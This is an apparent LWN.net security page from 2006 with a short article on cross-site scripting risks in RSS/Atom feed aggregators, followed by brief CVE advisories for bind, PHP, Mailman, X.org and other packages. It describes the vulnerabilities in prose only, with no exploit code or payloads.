Brief itemsReally Simple Syndication (RSS) and Atom are the two formats used to provide syndicated content and there are a variety of web-based and standalone clients that can read RSS/Atom feeds and display them to users. These clients often do not have proper filtering of the content provided and can be susceptible to various attacks.
Both RSS and Atom are XML-based formats that contain various elements of the content that is being syndicated -- title, description, story link, etc. A client program, often known as an 'aggregator' allows the user to subscribe to various feeds and will check periodically for new content. The aggregator then displays that information and the user can choose content items to look at more closely. Because much of the content is from websites, aggregators typically interpret HTML content in the feed data for display. This provides the means for attacks.
Malicious content, for cross-site scripting (XSS) or cross-site request forgery (XSRF) can be inserted into one of the textual portions of the feed data. If the aggregator does not sufficiently filter the received data, it may expose the user to the malware. Web-based aggregators are particularly susceptible as they run in a browser with all of the normal browser capabilities, but standalone clients often include browser-like rendering or will start a browser to follow feed links.
While it is certainly possible, it is probably unlikely that feed providers will directly put malware in their feeds; it is too easy to track them down. A much more likely scenario is feeds that syndicate user generated content, like comment feeds on blogs or sites like LWN (syndication information here). Depending on the filtering that the site does, it may be able to propagate malware within its syndication content. A malicious user could, anonymously at many sites, post a comment that contained malware and effectively co-opt that site into spreading it. A popular site could potentially spread this malware very widely, even if only a small percentage of its users' aggregators were affected.
In addition, many popular sites are 're-syndicated', their feeds are included in the feeds of aggregation sites. A security site, for instance, might display the feeds of several other security sites and include that content in their own feed. This provides for a virus-like propagation where a malicious user can inject content once and have it start showing up in multiple feeds. Some sites will also collect up mailing list entries or descriptions of new content available on peer-to-peer networks and add them to their syndication feed. This provides even more ways for someone to anonymously inject malware.
Bob Auger presented his findings (PDF) on this subject at Black Hat 2006 conference. He provides several examples of plausible malware attack scenarios as well as examples of RSS and Atom data that demonstrate these techniques.
The potential for malicious content in any data that originates from elsewhere really cannot be overstated. The tools we use on a day to day basis need to be aware of this potential and act appropriately. It may seem like security articles tediously repeat the same 'filter input data' mantra over and over, but, here is yet another place where proper filtering has been overlooked.
|Package(s):||bind||CVE #(s):||CVE-2006-4095 CVE-2006-4096|
|Created:||September 7, 2006||Updated:||February 1, 2007|
|Description:||Bind has two denial of service vulnerabilities.
Recursive servers queries for SIG records will trigger an assertion failure if more than one RR set is returned.
An INSIST failure can be triggered by sending a large number of recursive queries.
|Package(s):||flash-plugin||CVE #(s):||CVE-2006-3311 CVE-2006-3587 CVE-2006-3588|
|Created:||September 13, 2006||Updated:||October 5, 2006|
|Description:||Security issues were discovered in the Adobe Flash Player. It may be possible to execute arbitrary code on a victim's machine if the victim opens a malicious Adobe Flash file.|
|Created:||September 13, 2006||Updated:||September 13, 2006|
|Description:||A flaw has been found in isakmpd, OpenBSD's implementation of the Internet Key Exchange protocol, that caused Security Associations to be created with a replay window of 0 when isakmpd was acting as the responder during SA negotiation. This could allow an attacker to re-inject sniffed IPsec packets, which would not be checked against the replay counter.|
|Package(s):||mailman||CVE #(s):||CVE-2006-2941 CVE-2006-3636|
|Created:||September 8, 2006||Updated:||October 23, 2006|
|Description:||A flaw was found in the way Mailman handled MIME multipart messages. An
attacker could send a carefully crafted MIME multipart email message to a
mailing list run by Mailman which caused that particular mailing list
to stop working. (CVE-2006-2941)
Several cross-site scripting (XSS) issues were found in Mailman. An attacker could exploit these issues to perform cross-site scripting attacks against the Mailman administrator. (CVE-2006-3636)
|Package(s):||php||CVE #(s):||CVE-2006-4481 CVE-2006-4484 CVE-2006-4485|
|Created:||September 8, 2006||Updated:||June 13, 2008|
|Description:||The file_exists and imap_reopen functions in PHP before 5.1.5 do not check
for the safe_mode and open_basedir settings, which allows local users to
bypass the settings (CVE-2006-4481).
A buffer overflow in the LWZReadByte function in ext/gd/libgd/gd_gif_in.c in the GD extension in PHP before 5.1.5 allows remote attackers to have an unknown impact via a GIF file with input_code_size greater than MAX_LWZ_BITS, which triggers an overflow when initializing the table array (CVE-2006-4484).
The stripos function in PHP before 5.1.5 has unknown impact and attack vectors related to an out-of-bounds read (CVE-2006-4485).
|Package(s):||xorg-x11 xfree86||CVE #(s):||CVE-2006-3739 CVE-2006-3740|
|Created:||September 12, 2006||Updated:||December 14, 2006|
|Description:||iDefense reported two integer overflow flaws in the way the X.org server processed CID font files. A malicious authorized client could exploit this issue to cause a denial of service (crash) or potentially execute arbitrary code with root privileges on the X.org server.|
Page editor: Jonathan Corbet
Next page: Kernel development>>
Copyright © 2006, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds